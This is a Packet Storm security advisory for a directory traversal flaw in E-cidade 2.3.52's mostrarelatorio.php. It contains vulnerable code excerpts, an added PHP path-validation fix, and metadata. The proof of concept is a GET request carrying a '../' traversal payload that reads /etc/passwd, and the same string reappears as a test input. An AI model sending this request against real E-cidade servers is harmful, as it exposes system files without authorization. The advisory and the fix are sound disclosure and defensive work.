ID PACKETSTORM:138514 Type packetstorm Reporter vesp3r Modified 2016-08-26T00:00:00
Description
`E-cidade Directory Traversal
Vendor: DBSeller (www.dbseller.com.br)
Product: E-cidade - Software Publico de Gestao Municipal
Vulnerability discovered by vesp3r - vesp3r7c3@gmail.com
Product Description
--------------------
Intended to computerize the management of Brazilian municipalities. This includes computerized integration
between municipal entities: City Hall, Town Hall, Local Government, Foundations and others.
Resource savings are only one of the advantages of adopting e-cidade, alongside freedom of choice
of suppliers and assured continuity of the system, since it is supported by the Ministry of Planning.
Modules:
- HUMAN RESOURCES MANAGEMENT
- GEOPROCESSING
- HEALTH MANAGEMENT EDUCATION MANAGEMENT
- BUSINESS INTELLIGENCE
- FINANCIAL MANAGEMENT
- TAX MANAGEMENT
- ASSET MANAGEMENT
Advisory Timeline
-----------------
No vendor response
Vulnerable version:
-------------------
2.3.52 and prior
Vulnerability
-------------
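The vulnerability is in the 'mostrarelatorio.php' file of the package:
the 'arquivo' parameter is read from the GET request. In the code shown, it is appended to "/tmp/" and the
resulting path is passed to file_exists() and then to file(), whose return value is stored in a variable called 'arq'.
Because '../' sequences in 'arquivo' are part of that path, it can resolve to a file outside /tmp.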
/fpdf151/mostrarelatorio.php:
-----------------------------
[Snip...]
if(!file_exists("/tmp/".$arquivo)) {
    echo "<script>
    alert('Codigo nao Encontrado.');
    window.close();
    </script>";
    exit;
}
[Snip...]
$pdf=new PDF();
$pdf->Open();
$pdf->AliasNbPages();
$pdf->AddPage();
$arq = file("/tmp/".$arquivo);
[Snip...]
Proof of Concept
---------------
GET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1
`
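
A hardened form of the path handling described above, as an added example that is not E-cidade or DBSeller code. The helper name resolve_report_path() is hypothetical, and the example assumes reports are plain files stored directly in the base directory; the sample inputs are constructed.

```php
<?php
// Added example, not E-cidade code. resolve_report_path() is a hypothetical helper.
// Assumption: reports are plain files stored directly in the base directory.

function resolve_report_path(string $base, $name): ?string
{
    // Reject non-strings, empty values and embedded NUL bytes.
    if (!is_string($name) || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    // A report name must be a bare file name: no separators, no '.' or '..'.
    if ($name !== basename($name) || $name === '.' || $name === '..') {
        return null;
    }
    // realpath() resolves '..' and symlinks; false means the path does not exist.
    $baseReal = realpath($base);
    $full = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false || $full === false) {
        return null;
    }
    // The resolved path must still sit under the resolved base directory.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}

// Constructed sample input: one real temporary file plus names that must be refused.
$base = sys_get_temp_dir();
$sample = tempnam($base, 'rel');
$candidates = [
    basename($sample),
    './../../../../../../etc/passwd',   // the request value from the advisory
    '..',
    "relatorio\0.txt",
    ['array', 'instead', 'of', 'string'],
];
foreach ($candidates as $candidate) {
    $path = resolve_report_path($base, $candidate);
    printf("%-50s => %s\n", json_encode($candidate), $path ?? 'rejected');
}
unlink($sample);
```

In a script shaped like the excerpt, the returned path would replace both "/tmp/".$arquivo expressions, with a null result treated the same as the existing not-found branch.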
{"hash": "7ff11a5ad9592bb46fac91f56f66fc13bc221b8338b78f50fb7a2896cf1e7cde", "sourceHref": "https://packetstormsecurity.com/files/download/138514/ecidade2352-traversal.txt", "title": "E-Cidade 2.3.52 Directory Traversal", "id": "PACKETSTORM:138514", "published": "2016-08-26T00:00:00", "description": "", "modified": "2016-08-26T00:00:00", "sourceData": "`E-cidade Directory Traversal \nVendor: DBSeller (www.dbseller.com.br) \nProduct: E-cidade - Software Publico de Gestao Municipal \nVulnerability discovered by vesp3r - vesp3r7c3@gmail.com \n \n \nProduct Description \n-------------------- \n \nIntended to computerize the management of Brazilian Municipalities.This includes computerized integration \nbetween municipal entities: City Hall, Town Hall, Local Government, Foundations and others. \nThe economy of resources is only one of the advantages in the adoption of e-cidade and the freedom of choice \nof suppliers and ensuring continuity of the system, once supported by the Ministry of Planning. \n \nModules: \n \n- HUMAN RESOURCES MANAGEMENT \n- GEOPROCESSING \n- HEALTH MANAGEMENT EDUCATION MANAGEMENT \n- BUSINESS INTELIGENCE \n- FINANCIAL MANAGEMENT \n- TAX MANAGEMENT \n- ASSET MANAGEMENT \n \nAdvisory Timeline \n----------------- \n \nNo vendor response \n \n \nVulnerable version: \n------------------- \n \n2.3.52 and prior \n \nVulnerability \n------------- \n \nThe vulnerability exists within 'mostrarelatorio.php' file of the package: \nthe 'arquivo' variable is requested via GET method. It is passed as a variable to another variable called 'arq'. \nThis variable incorporates a call to the file() function. \n \n/fpdf151/mostrarelatorio.php: \n----------------------------- \n \n[Snip...] \n \n \nif(!file_exists(\"/tmp/\".$arquivo)) { \necho \"<script> \nalert('Codigo nao Encontrado.'); \nwindow.close(); \n</script>\"; \nexit; \n} \n \n[Snip...] 
\n \n$pdf=new PDF(); \n$pdf->Open(); \n$pdf->AliasNbPages(); \n$pdf->AddPage(); \n$arq = file(\"/tmp/\".$arquivo); \n \n \n[Snip...] \n \n \n \nProof of Concept \n--------------- \n \nGET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1 \n`\n", "reporter": "vesp3r", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "52954f1093657f3313d1c50e8d309d81"}, {"key": "modified", "hash": "4ef38881c143abc958fb81f5f52eaf21"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "4ef38881c143abc958fb81f5f52eaf21"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bab05830c1048ee58d5530d328e182dd"}, {"key": "sourceData", "hash": "2af33438eae3c72f83d1a369e3b69a27"}, {"key": "sourceHref", "hash": "bfbb569c67a331c49bf11515bafe2e02"}, {"key": "title", "hash": "05d1f357dd70be4cbd7960732a844bc7"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/138514/E-Cidade-2.3.52-Directory-Traversal.html", "lastseen": "2016-11-03T10:16:14", "viewCount": 0, "enchantments": {"vulnersScore": 8.3}}